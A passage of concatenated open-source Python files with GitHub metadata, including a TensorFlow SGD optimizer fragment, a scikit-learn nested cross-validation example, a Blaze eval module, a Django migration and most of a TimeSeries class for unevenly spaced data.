handle.handle, indices, -grad * self._get_hyper("learning_rate"))
def _apply_sparse_duplicate_indices(self, grad, var):
delta = ops.IndexedSlices(
grad.values * math_ops.cast(
self._get_hyper("learning_rate"), var.dtype.base_dtype),
grad.indices, grad.dense_shape)
return var.scatter_sub(delta, use_locking=self._use_locking)
def get_config(self):
config = super(SGD, self).get_config()
config.update({
"learning_rate": self._serialize_hyperparameter("learning_rate"),
})
return config
|
{
"content_hash": "7fc30f2da8ab379b89e39b0b09be93ff",
"timestamp": "",
"source": "github",
"line_count": 77,
"max_line_length": 78,
"avg_line_length": 34.87012987012987,
"alnum_prop": 0.6919925512104284,
"repo_name": "alshedivat/tensorflow",
"id": "e26c82279f580f9f544b5f475ff3a945c73e35bd",
"size": "3374",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tensorflow/python/keras/optimizer_v2/gradient_descent.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Assembly",
"bytes": "3325"
},
{
"name": "Batchfile",
"bytes": "10132"
},
{
"name": "C",
"bytes": "439824"
},
{
"name": "C#",
"bytes": "8446"
},
{
"name": "C++",
"bytes": "50398044"
},
{
"name": "CMake",
"bytes": "199209"
},
{
"name": "Dockerfile",
"bytes": "36386"
},
{
"name": "Go",
"bytes": "1276639"
},
{
"name": "HTML",
"bytes": "4681865"
},
{
"name": "Java",
"bytes": "871083"
},
{
"name": "Jupyter Notebook",
"bytes": "2604347"
},
{
"name": "LLVM",
"bytes": "6536"
},
{
"name": "Makefile",
"bytes": "61311"
},
{
"name": "Objective-C",
"bytes": "15650"
},
{
"name": "Objective-C++",
"bytes": "99243"
},
{
"name": "PHP",
"bytes": "1357"
},
{
"name": "Perl",
"bytes": "7536"
},
{
"name": "PureBasic",
"bytes": "25356"
},
{
"name": "Python",
"bytes": "40038696"
},
{
"name": "RobotFramework",
"bytes": "890"
},
{
"name": "Ruby",
"bytes": "553"
},
{
"name": "Shell",
"bytes": "486609"
},
{
"name": "Smarty",
"bytes": "6976"
}
],
"symlink_target": ""
}
|
baggage_key = 'crossdock-baggage-key'
|
{
"content_hash": "fab64840c0a9d9bea51fbc5d1b20f3dd",
"timestamp": "",
"source": "github",
"line_count": 1,
"max_line_length": 37,
"avg_line_length": 38,
"alnum_prop": 0.7631578947368421,
"repo_name": "guillermo-sentinella/jaeger-client-python",
"id": "d6da9ff0a40bef847766ffa6c6d5c38c24d5144a",
"size": "38",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "crossdock/server/constants.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Makefile",
"bytes": "3725"
},
{
"name": "Python",
"bytes": "225177"
}
],
"symlink_target": ""
}
|
"""
=========================================
Nested versus non-nested cross-validation
=========================================
This example compares non-nested and nested cross-validation strategies on a
classifier of the iris data set. Nested cross-validation (CV) is often used to
train a model in which hyperparameters also need to be optimized. Nested CV
estimates the generalization error of the underlying model and its
(hyper)parameter search. Choosing the parameters that maximize non-nested CV
biases the model to the dataset, yielding an overly-optimistic score.
Model selection without nested CV uses the same data to tune model parameters
and evaluate model performance. Information may thus "leak" into the model
and overfit the data. The magnitude of this effect is primarily dependent on
the size of the dataset and the stability of the model. See Cawley and Talbot
[1]_ for an analysis of these issues.
To avoid this problem, nested CV effectively uses a series of
train/validation/test set splits. In the inner loop (here executed by
:class:`GridSearchCV <sklearn.model_selection.GridSearchCV>`), the score is
approximately maximized by fitting a model to each training set, and then
directly maximized in selecting (hyper)parameters over the validation set. In
the outer loop (here in :func:`cross_val_score
<sklearn.model_selection.cross_val_score>`), generalization error is estimated
by averaging test set scores over several dataset splits.
The example below uses a support vector classifier with a non-linear kernel to
build a model with optimized hyperparameters by grid search. We compare the
performance of non-nested and nested CV strategies by taking the difference
between their scores.
.. topic:: See Also:
- :ref:`cross_validation`
- :ref:`grid_search`
.. topic:: References:
.. [1] `Cawley, G.C.; Talbot, N.L.C. On over-fitting in model selection and
subsequent selection bias in performance evaluation.
J. Mach. Learn. Res 2010,11, 2079-2107.
<http://jmlr.csail.mit.edu/papers/volume11/cawley10a/cawley10a.pdf>`_
"""
from sklearn.datasets import load_iris
from matplotlib import pyplot as plt
from sklearn.svm import SVC
from sklearn.model_selection import GridSearchCV, cross_val_score, KFold
import numpy as np
print(__doc__)
# Number of random trials
NUM_TRIALS = 30
# Load the dataset
iris = load_iris()
X_iris = iris.data
y_iris = iris.target
# Set up possible values of parameters to optimize over
p_grid = {"C": [1, 10, 100],
"gamma": [.01, .1]}
# We will use a Support Vector Classifier with "rbf" kernel
svm = SVC(kernel="rbf")
# Arrays to store scores
non_nested_scores = np.zeros(NUM_TRIALS)
nested_scores = np.zeros(NUM_TRIALS)
# Loop for each trial
for i in range(NUM_TRIALS):
# Choose cross-validation techniques for the inner and outer loops,
# independently of the dataset.
# E.g "GroupKFold", "LeaveOneOut", "LeaveOneGroupOut", etc.
inner_cv = KFold(n_splits=4, shuffle=True, random_state=i)
outer_cv = KFold(n_splits=4, shuffle=True, random_state=i)
# Non_nested parameter search and scoring
clf = GridSearchCV(estimator=svm, param_grid=p_grid, cv=inner_cv)
clf.fit(X_iris, y_iris)
non_nested_scores[i] = clf.best_score_
# Nested CV with parameter optimization
nested_score = cross_val_score(clf, X=X_iris, y=y_iris, cv=outer_cv)
nested_scores[i] = nested_score.mean()
score_difference = non_nested_scores - nested_scores
print("Average difference of {0:6f} with std. dev. of {1:6f}."
.format(score_difference.mean(), score_difference.std()))
# Plot scores on each trial for nested and non-nested CV
plt.figure()
plt.subplot(211)
non_nested_scores_line, = plt.plot(non_nested_scores, color='r')
nested_line, = plt.plot(nested_scores, color='b')
plt.ylabel("score", fontsize="14")
plt.legend([non_nested_scores_line, nested_line],
["Non-Nested CV", "Nested CV"],
bbox_to_anchor=(0, .4, .5, 0))
plt.title("Non-Nested and Nested Cross Validation on Iris Dataset",
x=.5, y=1.1, fontsize="15")
# Plot bar chart of the difference.
plt.subplot(212)
difference_plot = plt.bar(range(NUM_TRIALS), score_difference)
plt.xlabel("Individual Trial #")
plt.legend([difference_plot],
["Non-Nested CV - Nested CV Score"],
bbox_to_anchor=(0, 1, .8, 0))
plt.ylabel("score difference", fontsize="14")
plt.show()
|
{
"content_hash": "3321336fd4a7066e05620544fef76b27",
"timestamp": "",
"source": "github",
"line_count": 117,
"max_line_length": 79,
"avg_line_length": 37.73504273504273,
"alnum_prop": 0.716647791619479,
"repo_name": "vortex-ape/scikit-learn",
"id": "b40dc91fc4d8f645560e83ad0293a8f9106e0bff",
"size": "4415",
"binary": false,
"copies": "7",
"ref": "refs/heads/master",
"path": "examples/model_selection/plot_nested_cross_validation_iris.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Batchfile",
"bytes": "3366"
},
{
"name": "C",
"bytes": "394787"
},
{
"name": "C++",
"bytes": "140225"
},
{
"name": "Makefile",
"bytes": "1588"
},
{
"name": "PowerShell",
"bytes": "17312"
},
{
"name": "Python",
"bytes": "6351428"
},
{
"name": "Shell",
"bytes": "8687"
}
],
"symlink_target": ""
}
|
import ga, Matrix, Ann, copy, random
## initialise the GA
oga = ga.ga()
oga.seedGA(5, 20, 5, 4)
for p in oga.getPopulation():
print(p["second_thresholds"])
print(p["second_thresholds"].renderT())
pop = oga.getPopulation()
newPop = []
for n in range(5):
newPop.append(copy.deepcopy(pop[0]))
currVal = newPop[n]["second_thresholds"].getElem(1, 0)
currVal += (0.1 - random.random()*0.2)
newPop[n]["second_thresholds"].setElem(1, 0, currVal)
print("New Pop")
for p in newPop:
print(p["second_thresholds"])
print(p["second_thresholds"].renderT())
## now test the roulette process
roulettePop = oga.roulette([1,1,1,1,1])
print("Roulette Pop")
for p in roulettePop:
print(p["second_thresholds"])
print(p["second_thresholds"].renderT())
## Finally, test the mutation...
mga = ga.ga()
mga.setGA(roulettePop)
mga.mutatePopulation(roulettePop, 0.1, 1)
print("Mutated Pop")
for p in mga.getPopulation():
print(p["second_thresholds"])
print(p["second_thresholds"].renderT())
|
{
"content_hash": "3b16ac8f28edd287a024cba80be7d5a6",
"timestamp": "",
"source": "github",
"line_count": 44,
"max_line_length": 55,
"avg_line_length": 22.40909090909091,
"alnum_prop": 0.6906693711967545,
"repo_name": "bluemini/agenetic",
"id": "14b70d4b7305d1499daa04196269cdc5ceb477e6",
"size": "2559",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "test/test_matrix_copy.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "37648"
}
],
"symlink_target": ""
}
|
from geopy.point import Point
from geopy.location import Location
from geopy import geocoders
VERSION = (0, 95, 1)
def get_version():
version = '%s.%s' % (VERSION[0], VERSION[1])
if VERSION[2]:
version = '%s.%s' % (version, VERSION[2])
if VERSION[3:]:
version = '%s.%s' % (version, VERSION[3])
return version
|
{
"content_hash": "1a1ffc7e1b9ba49aa63d0846a5288d20",
"timestamp": "",
"source": "github",
"line_count": 13,
"max_line_length": 49,
"avg_line_length": 26.384615384615383,
"alnum_prop": 0.6122448979591837,
"repo_name": "AdaptiveApplications/carnegie",
"id": "dc4b80aaf978e9d58d33ca32f39a073afa788f90",
"size": "343",
"binary": false,
"copies": "14",
"ref": "refs/heads/master",
"path": "tarc_bus_locator_client/geopy-0.95.1/geopy/__init__.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "4023"
},
{
"name": "C",
"bytes": "20612685"
},
{
"name": "C++",
"bytes": "7216064"
},
{
"name": "CMake",
"bytes": "18586"
},
{
"name": "CSS",
"bytes": "216171"
},
{
"name": "Emacs Lisp",
"bytes": "7798"
},
{
"name": "Fortran",
"bytes": "7795"
},
{
"name": "HTML",
"bytes": "12999"
},
{
"name": "Java",
"bytes": "1341804"
},
{
"name": "JavaScript",
"bytes": "20474"
},
{
"name": "M4",
"bytes": "45508"
},
{
"name": "Makefile",
"bytes": "932812"
},
{
"name": "PureBasic",
"bytes": "165856"
},
{
"name": "Python",
"bytes": "11658962"
},
{
"name": "Roff",
"bytes": "5923"
},
{
"name": "Shell",
"bytes": "1442066"
},
{
"name": "Vim script",
"bytes": "3731"
}
],
"symlink_target": ""
}
|
from __future__ import absolute_import, division, print_function
# Implements the blaze.eval function
from .air import prepare, interps
from .. import array
#------------------------------------------------------------------------
# Eval
#------------------------------------------------------------------------
def eval(arr, storage=None, caps={'efficient-write': True}, out=None,
strategy=None):
"""Evaluates a deferred blaze kernel tree
data descriptor into a concrete array.
If the array is already concrete, merely
returns it unchanged.
Parameters
----------
storage: blaze.Storage, optional
Where to store the result, if evaluating to a BLZ
output or (in the future) to a distributed array.
caps: { str : object }
Capabilities for evaluation and storage
TODO: elaborate on values
out: Array
Output array to store the result in, or None for a new array
strategy: str
Evaluation strategy.
Currently supported: 'py', 'jit'
"""
strategy = strategy or arr._data.strategy
if arr._data.capabilities.deferred:
result = eval_deferred(arr, storage, caps, out, strategy)
elif arr._data.capabilities.remote:
# Retrieve the data to local memory
# TODO: Caching should play a role here.
result = array(arr._data.dynd_arr())
else:
# TODO: This isn't right if the storage is different, requires
# a copy then.
result = arr
return result
def eval_deferred(arr, storage, caps, out, strategy):
expr = arr._data.expr
graph, ctx = expr
# Construct and transform AIR
func, env = prepare(expr, strategy)
# Find evaluator
interp = interps.lookup_interp(strategy)
# Interpreter-specific compilation/assembly
func, env = interp.compile(func, env)
# Run with collected 'params' from the expression
args = [ctx.terms[param] for param in ctx.params]
result = interp.interpret(func, env, args=args, storage=storage,
caps=caps, out=out, strategy=strategy)
return result
#------------------------------------------------------------------------
# Append
#------------------------------------------------------------------------
def append(arr, values):
"""Append a list of values."""
# XXX If not efficient appends supported, this should raise
# a `PerformanceWarning`
if hasattr(arr._data, 'append'):
arr._data.append(values)
else:
raise NotImplementedError('append is not implemented for this '
'object')
|
{
"content_hash": "2f3dace5ade5aa11e6fca578191e5de7",
"timestamp": "",
"source": "github",
"line_count": 84,
"max_line_length": 73,
"avg_line_length": 31.416666666666668,
"alnum_prop": 0.5695339143615006,
"repo_name": "zeeshanali/blaze",
"id": "a5b57f2818b12f41286a7e324e1fb82613f3b216",
"size": "2639",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "blaze/compute/eval.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [],
"symlink_target": ""
}
|
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('sponsors', '0087_auto_20220810_1647'),
]
operations = [
migrations.AddField(
model_name='tieredbenefit',
name='display_label',
field=models.CharField(blank=True, default='', help_text='If populated, this will be displayed instead of the quantity value.', max_length=32),
),
migrations.AddField(
model_name='tieredbenefitconfiguration',
name='display_label',
field=models.CharField(blank=True, default='', help_text='If populated, this will be displayed instead of the quantity value.', max_length=32),
),
]
|
{
"content_hash": "4dacf8d98a712e3d7de05ee20bff843d",
"timestamp": "",
"source": "github",
"line_count": 21,
"max_line_length": 155,
"avg_line_length": 35.142857142857146,
"alnum_prop": 0.6260162601626016,
"repo_name": "python/pythondotorg",
"id": "f0203331baa6d5733fdbc9755e8681432d2d32b0",
"size": "788",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "sponsors/migrations/0088_auto_20220810_1655.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "7686"
},
{
"name": "Dockerfile",
"bytes": "229"
},
{
"name": "HTML",
"bytes": "498813"
},
{
"name": "JavaScript",
"bytes": "24050"
},
{
"name": "Makefile",
"bytes": "1615"
},
{
"name": "PostScript",
"bytes": "19072"
},
{
"name": "Procfile",
"bytes": "105"
},
{
"name": "Python",
"bytes": "1145343"
},
{
"name": "Ruby",
"bytes": "1464"
},
{
"name": "SCSS",
"bytes": "198033"
}
],
"symlink_target": ""
}
|
from multi import MultiRecipientElement
|
{
"content_hash": "aa72ad627e5dd7b9e669814b81221290",
"timestamp": "",
"source": "github",
"line_count": 1,
"max_line_length": 39,
"avg_line_length": 40,
"alnum_prop": 0.9,
"repo_name": "schristakidis/p2ner",
"id": "da1bc73a435e31dd05f004c78351aefb58bb8c78",
"size": "683",
"binary": false,
"copies": "1",
"ref": "refs/heads/development",
"path": "p2ner/components/pipeelement/multirecipientelement/multirecipientelement/__init__.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "303"
},
{
"name": "Python",
"bytes": "1319300"
}
],
"symlink_target": ""
}
|
"""A class for manipulating time series based on measurements at
unevenly-spaced times, see:
http://en.wikipedia.org/wiki/Unevenly_spaced_time_series
"""
import csv
import datetime
import itertools
import pprint
from queue import PriorityQueue
import sortedcontainers
from dateutil.parser import parse as date_parse
from infinity import inf
from . import histogram, operations, utils, plot
class TimeSeries(object):
"""A class to help manipulate and analyze time series that are the
result of taking measurements at irregular points in time. For
example, here would be a simple time series that starts at 8am and
goes to 9:59am:
>>> ts = TimeSeries()
>>> ts['8:00am'] = 0
>>> ts['8:47am'] = 1
>>> ts['8:51am'] = 0
>>> ts['9:15am'] = 1
>>> ts['9:59am'] = 0
The value of the time series is the last recorded measurement: for
example, at 8:05am the value is 0 and at 8:48am the value is 1. So:
>>> ts['8:05am']
0
>>> ts['8:48am']
1
There are also a bunch of things for operating on another time
series: sums, difference, logical operators and such.
"""
def __init__(self, data=None, default=None):
self._d = sortedcontainers.SortedDict(data)
self.default = default
self.getter_functions = {
"previous": self._get_previous,
"linear": self._get_linear_interpolate,
}
def __getstate__(self):
return {
"data": self.items(),
"default": self.default,
}
def __setstate__(self, state):
self.__init__(**state)
def __iter__(self):
"""Iterate over sorted (time, value) pairs."""
return iter(self._d.items())
def __bool__(self):
return bool(self._d)
def is_empty(self):
return len(self) == 0
@property
def default(self):
"""Return the default value of the time series."""
return self._default
@default.setter
def default(self, value):
"""Set the default value of the time series."""
self._default = value
def _get_linear_interpolate(self, time):
right_index = self._d.bisect_right(time)
left_index = right_index - 1
if left_index < 0:
return self.default
elif right_index == len(self._d):
# right of last measurement
return self.last_item()[1]
else:
left_time, left_value = self._d.peekitem(left_index)
right_time, right_value = self._d.peekitem(right_index)
dt_interval = right_time - left_time
dt_start = time - left_time
if isinstance(dt_interval, datetime.timedelta):
dt_interval = dt_interval.total_seconds()
dt_start = dt_start.total_seconds()
slope = float(right_value - left_value) / dt_interval
value = slope * dt_start + left_value
return value
def _get_previous(self, time):
right_index = self._d.bisect_right(time)
left_index = right_index - 1
if right_index > 0:
_, left_value = self._d.peekitem(left_index)
return left_value
elif right_index == 0:
return self.default
else:
msg = (
"self._d.bisect_right({}) returned a negative value. "
"""This "can't" happen: please file an issue at """
"https://github.com/datascopeanalytics/traces/issues"
).format(time)
raise ValueError(msg)
def get(self, time, interpolate="previous"):
"""Get the value of the time series, even in-between measured values.
"""
try:
getter = self.getter_functions[interpolate]
except KeyError:
msg = (
"unknown value '{}' for interpolate, "
"valid values are in [{}]"
).format(interpolate, ", ".join(self.getter_functions))
raise ValueError(msg)
else:
return getter(time)
def get_item_by_index(self, index):
"""Get the (t, value) pair of the time series by index."""
return self._d.peekitem(index)
def last_item(self):
"""Returns the last (time, value) pair of the time series."""
return self.get_item_by_index(-1)
def last_key(self):
"""Returns the last time recorded in the time series"""
return self.last_item()[0]
def last_value(self):
"""Returns the last recorded value in the time series"""
return self.last_item()[1]
def first_item(self):
"""Returns the first (time, value) pair of the time series."""
return self.get_item_by_index(0)
def first_key(self):
"""Returns the first time recorded in the time series"""
return self.first_item()[0]
def first_value(self):
"""Returns the first recorded value in the time series"""
return self.first_item()[1]
def set(self, time, value, compact=False):
"""Set the value for the time series. If compact is True, only set the
value if it's different from what it would be anyway.
"""
if (
(len(self) == 0)
or (not compact)
or (compact and self.get(time) != value)
):
self._d[time] = value
def set_interval(self, start, end, value, compact=False):
"""Set the value for the time series on an interval. If compact is
True, only set the value if it's different from what it would
be anyway.
"""
# for each interval to render
for i, (s, e, v) in enumerate(self.iterperiods(start, end)):
# look at all intervals included in the current interval
# (always at least 1)
if i == 0:
# if the first, set initial value to new value of range
self.set(s, value, compact)
else:
# otherwise, remove intermediate key
del self[s]
# finish by setting the end of the interval to the previous value
self.set(end, v, compact)
def compact(self):
"""Convert this instance to a compact version: the value will be the
same at all times, but repeated measurements are discarded.
"""
previous_value = object()
redundant = []
for time, value in self:
if value == previous_value:
redundant.append(time)
previous_value = value
for time in redundant:
del self[time]
def items(self):
"""ts.items() -> list of the (key, value) pairs in ts, as 2-tuples"""
return self._d.items()
def exists(self):
"""returns False when the timeseries has a None value, True
otherwise
"""
result = TimeSeries(default=False if self.default is None else True)
for t, v in self:
result[t] = False if v is None else True
return result
def remove(self, time):
"""Allow removal of measurements from the time series. This throws an
error if the given time is not actually a measurement point.
"""
try:
del self._d[time]
except KeyError:
raise KeyError("no measurement at {}".format(time))
def remove_points_from_interval(self, start, end):
"""Allow removal of all points from the time series within a interval
[start:end].
"""
for s, e, v in self.iterperiods(start, end):
try:
del self._d[s]
except KeyError:
pass
def n_measurements(self):
"""Return the number of measurements in the time series."""
return len(self._d)
def __len__(self):
"""Number of points in the TimeSeries."""
return self.n_measurements()
def __repr__(self):
return "<TimeSeries>\n%s\n</TimeSeries>" % pprint.pformat(self._d)
def iterintervals(self, n=2):
"""Iterate over groups of `n` consecutive measurement points in the
time series.
"""
# tee the original iterator into n identical iterators
streams = itertools.tee(iter(self), n)
# advance the "cursor" on each iterator by an increasing
# offset, e.g. if n=3:
#
# [a, b, c, d, e, f, ..., w, x, y, z]
# first cursor --> *
# second cursor --> *
# third cursor --> *
for stream_index, stream in enumerate(streams):
for _ in range(stream_index):
next(stream)
# now, zip the offset streams back together to yield tuples,
# in the n=3 example it would yield:
# (a, b, c), (b, c, d), ..., (w, x, y), (x, y, z)
for intervals in zip(*streams):
yield intervals
@staticmethod
def _value_function(value):
# if value is None, don't filter
if value is None:
def value_function(t0_, t1_, value_):
return True
# if value is a function, use the function to filter
elif callable(value):
value_function = value
# if value is a constant other than None, then filter to
# return only the intervals where the value equals the
# constant
else:
def value_function(t0_, t1_, value_):
return value_ == value
return value_function
def iterperiods(self, start=None, end=None, value=None):
"""This iterates over the periods (optionally, within a given time
span) and yields (interval start, interval end, value) tuples.
TODO: add mask argument here.
"""
start, end, mask = self._check_boundaries(
start, end, allow_infinite=False
)
value_function = self._value_function(value)
# get start index and value
start_index = self._d.bisect_right(start)
if start_index:
_, start_value = self._d.peekitem(start_index - 1)
else:
start_value = self.default
# get last index before end of time span
end_index = self._d.bisect_right(end)
interval_t0, interval_value = start, start_value
for interval_t1 in self._d.islice(start_index, end_index):
if value_function(interval_t0, interval_t1, interval_value):
yield interval_t0, interval_t1, interval_value
# set start point to the end of this interval for next
# iteration
interval_t0 = interval_t1
interval_value = self[interval_t0]
# yield the time, duration, and value of the final period
if interval_t0 < end:
if value_function(interval_t0, end, interval_value):
yield interval_t0, end, interval_value
def slice(self, start, end):
"""Return an equivalent TimeSeries that only has points between
`start` and `end` (always starting at `start`)
"""
start, end, mask = self._check_boundaries(
start, end, allow_infinite=True
)
result = TimeSeries(default=self.default)
for t0, t1, value in self.iterperiods(start, end):
result[t0] = value
result[t1] = self[t1]
return result
def _check_regularization(self, start, end, sampling_period=None):
# only do these checks if sampling period is given
if sampling_period is not None:
# cast to both seconds and timedelta for error checking
if isinstance(sampling_period, datetime.timedelta):
sampling_period_seconds = sampling_period.total_seconds()
sampling_period_timedelta = sampling_period
else:
sampling_period_seconds = sampling_period
sampling_period_timedelta = datetime.timedelta(
seconds=sampling_period
)
if sampling_period_seconds <= 0:
msg = "sampling_period must be > 0"
raise ValueError(msg)
if sampling_period_seconds > utils.duration_to_number(end - start):
msg = (
"sampling_period "
"is greater than the duration between "
"start and end."
)
raise ValueError(msg)
if isinstance(start, datetime.date):
sampling_period = sampling_period_timedelta
else:
sampling_period = sampling_period_seconds
return sampling_period
def sample(
self, sampling_period, start=None, end=None, interpolate="previous"
):
"""Sampling at regular time periods.
"""
start, end, mask = self._check_boundaries(start, end)
sampling_period = self._check_regularization(
start, end, sampling_period
)
result = []
current_time = start
while current_time <= end:
value = self.get(current_time, interpolate=interpolate)
result.append((current_time, value))
current_time += sampling_period
return result
def moving_average(
self,
sampling_period,
window_size=None,
start=None,
end=None,
placement="center",
pandas=False,
):
"""Averaging over regular intervals
"""
start, end, mask = self._check_boundaries(start, end)
# default to sampling_period if not given
if window_size is None:
window_size = sampling_period
sampling_period = self._check_regularization(
start, end, sampling_period
)
# convert to datetime if the times are datetimes
full_window = window_size * 1.
half_window = full_window / 2
if isinstance(start, datetime.date) and not isinstance(
full_window, datetime.timedelta
):
half_window = datetime.timedelta(seconds=half_window)
full_window = datetime.timedelta(seconds=full_window)
result = []
current_time = start
while current_time <= end:
if placement == "center":
window_start = current_time - half_window
window_end = current_time + half_window
elif placement == "left":
window_start = current_time
window_end = current_time + full_window
elif placement == "right":
window_start = current_time - full_window
window_end = current_time
else:
msg = 'unknown placement "{}"'.format(placement)
raise ValueError(msg)
# calculate mean over window and add (t, v) tuple to list
try:
mean = self.mean(window_start, window_end)
except TypeError as e:
if "NoneType" in str(e):
mean = None
else:
raise e
result.append((current_time, mean))
current_time += sampling_period
# convert to pandas Series if pandas=True
if pandas:
try:
import pandas as pd
except ImportError:
msg = "can't have pandas=True if pandas is not installed"
raise ImportError(msg)
result = pd.Series(
[v for t, v in result], index=[t for t, v in result],
)
return result
@staticmethod
def rebin(binned, key_function):
result = sortedcontainers.SortedDict()
for bin_start, value in binned.items():
new_bin_start = key_function(bin_start)
try:
result[new_bin_start] += value
except KeyError:
result[new_bin_start] = value
return result
def bin(
self,
unit,
n_units=1,
start=None,
end=None,
mask=None,
smaller=None,
transform="distribution",
):
# return an empty sorted dictionary if there is no time span
if mask is not None and mask.is_empty():
return sortedcontainers.SortedDict()
elif start is not None and start == end:
return sortedcontainers.SortedDict()
# use smaller if available
if smaller:
return self.rebin(
smaller, lambda x: utils.datetime_floor(x, unit, n_units),
)
start, end, mask = self._check_boundaries(start, end, mask=mask)
start = utils.datetime_floor(start, unit=unit, n_units=n_units)
function = getattr(self, transform)
result = sortedcontainers.SortedDict()
dt_range = utils.datetime_range(start, end, unit, n_units=n_units)
for bin_start, bin_end in utils.pairwise(dt_range):
result[bin_start] = function(
bin_start, bin_end, mask=mask, normalized=False
)
return result
def mean(self, start=None, end=None, mask=None, interpolate="previous"):
"""This calculated the average value of the time series over the given
time range from `start` to `end`, when `mask` is truthy.
"""
return self.distribution(
start=start, end=end, mask=mask, interpolate=interpolate
).mean()
def distribution(
self,
start=None,
end=None,
normalized=True,
mask=None,
interpolate="previous",
):
"""Calculate the distribution of values over the given time range from
`start` to `end`.
Args:
start (orderable, optional): The lower time bound of
when to calculate the distribution. By default, the
first time point will be used.
end (orderable, optional): The upper time bound of
when to calculate the distribution. By default, the
last time point will be used.
normalized (bool): If True, distribution will sum to
one. If False and the time values of the TimeSeries
are datetimes, the units will be seconds.
mask (:obj:`TimeSeries`, optional): A domain on which to
calculate the distribution.
interpolate (str, optional): Method for interpolating
between measurement points: either "previous"
(default) or "linear". Note: if "previous" is used,
then the resulting histogram is exact. If "linear" is
given, then the values used for the histogram are the
average value for each segment -- the mean of this
histogram will be exact, but higher moments (variance)
will be approximate.
Returns:
:obj:`Histogram` with the results.
"""
start, end, mask = self._check_boundaries(start, end, mask=mask)
counter = histogram.Histogram()
for i_start, i_end, _ in mask.iterperiods(value=True):
for t0, t1, _ in self.iterperiods(i_start, i_end):
duration = utils.duration_to_number(t1 - t0, units="seconds",)
midpoint = utils.time_midpoint(t0, t1)
value = self.get(midpoint, interpolate=interpolate)
try:
counter[value] += duration
except histogram.UnorderableElements:
counter = histogram.Histogram.from_dict(
dict(counter), key=hash
)
counter[value] += duration
# divide by total duration if result needs to be normalized
if normalized:
return counter.normalized()
else:
return counter
def n_points(
self,
start=-inf,
end=+inf,
mask=None,
include_start=True,
include_end=False,
normalized=False,
):
"""Calculate the number of points over the given time range from
`start` to `end`.
Args:
start (orderable, optional): The lower time bound of when
to calculate the distribution. By default, start is
-infinity.
end (orderable, optional): The upper time bound of when to
calculate the distribution. By default, the end is
+infinity.
mask (:obj:`TimeSeries`, optional): A
domain on which to calculate the distribution.
Returns:
`int` with the result
"""
# just go ahead and return 0 if we already know it regardless
# of boundaries
if not self.n_measurements():
return 0
start, end, mask = self._check_boundaries(start, end, mask=mask)
count = 0
for i_start, i_end, _ in mask.iterperiods(value=True):
if include_end:
end_count = self._d.bisect_right(i_end)
else:
end_count = self._d.bisect_left(i_end)
if include_start:
start_count = self._d.bisect_left(i_start)
else:
start_count = self._d.bisect_right(i_start)
count += end_count - start_count
if normalized:
count /= float(self.n_measurements())
return count
def _check_time_series(self, other):
"""Function used to check the type of the argument and raise an
informative error message if it's not a TimeSeries.
"""
if not isinstance(other, TimeSeries):
msg = "unsupported operand types(s) for +: %s and %s" % (
type(self),
type(other),
)
raise TypeError(msg)
@staticmethod
def _iter_merge(timeseries_list):
"""This function uses a priority queue to efficiently yield the (time,
value_list) tuples that occur from merging together many time
series.
"""
# cast to list since this is getting iterated over several
# times (causes problem if timeseries_list is a generator)
timeseries_list = list(timeseries_list)
# Create iterators for each timeseries and then add the first
# item from each iterator onto a priority queue. The first
# item to be popped will be the one with the lowest time
queue = PriorityQueue()
for index, timeseries in enumerate(timeseries_list):
iterator = iter(timeseries)
try:
t, value = next(iterator)
except StopIteration:
pass
else:
queue.put((t, index, value, iterator))
# `state` keeps track of the value of the merged
# TimeSeries. It starts with the default. It starts as a list
# of the default value for each individual TimeSeries.
state = [ts.default for ts in timeseries_list]
while not queue.empty():
# get the next time with a measurement from queue
t, index, next_value, iterator = queue.get()
# make a copy of previous state, and modify only the value
# at the index of the TimeSeries that this item came from
state = list(state)
state[index] = next_value
yield t, state
# add the next measurement from the time series to the
# queue (if there is one)
try:
t, value = next(iterator)
except StopIteration:
pass
else:
queue.put((t, index, value, iterator))
@classmethod
def iter_merge(cls, timeseries_list):
"""Iterate through several time series in order, yielding (time, list)
tuples where list is the values of each individual TimeSeries
in the list at time t.
"""
# using return without an argument is the way to say "the
# iterator is empty" when there is nothing to iterate over
# (the more you know...)
if not timeseries_list:
return
# for ts in timeseries_list:
# if ts.is_floating():
# msg = "can't merge empty TimeSeries with no default value"
# raise KeyError(msg)
# This function mostly wraps _iter_merge, the main point of
# this is to deal with the case of tied times, where we only
# want to yield the last list of values that occurs for any
# group of tied times.
index, previous_t, previous_state = -1, object(), object()
for index, (t, state) in enumerate(cls._iter_merge(timeseries_list)):
if index > 0 and t != previous_t:
yield previous_t, previous_state
previous_t, previous_state = t, state
# only yield final thing if there was at least one element
# yielded by _iter_merge
if index > -1:
yield previous_t, previous_state
@classmethod
def merge(cls, ts_list, compact=True, operation=None):
"""Iterate through several time series in order, yielding (time,
`value`) where `value` is the either the list of each
individual TimeSeries in the list at time t (in the same order
as in ts_list) or the result of the optional `operation` on
that list of values.
"""
# If operation is not given then the default is the list
# of defaults of all time series
# If operation is given, then the default is the result of
# the operation over the list of all defaults
default = [ts.default for ts in ts_list]
if operation:
default = operation(default)
result = cls(default=default)
for t, merged in cls.iter_merge(ts_list):
if operation is None:
value = merged
else:
value = operation(merged)
result.set(t, value, compact=compact)
return result
@staticmethod
def csv_time_transform(raw):
return date_parse(raw)
@staticmethod
def csv_value_transform(raw):
return str(raw)
@classmethod
def from_csv(
cls,
filename,
time_column=0,
value_column=1,
time_transform=None,
value_transform=None,
skip_header=True,
default=None,
):
# use default on class if not given
if time_transform is None:
time_transform = cls.csv_time_transform
if value_transform is None:
value_transform = cls.csv_value_transform
result = cls(default=default)
with open(filename) as infile:
reader = csv.reader(infile)
if skip_header:
next(reader)
for row in reader:
time = time_transform(row[time_column])
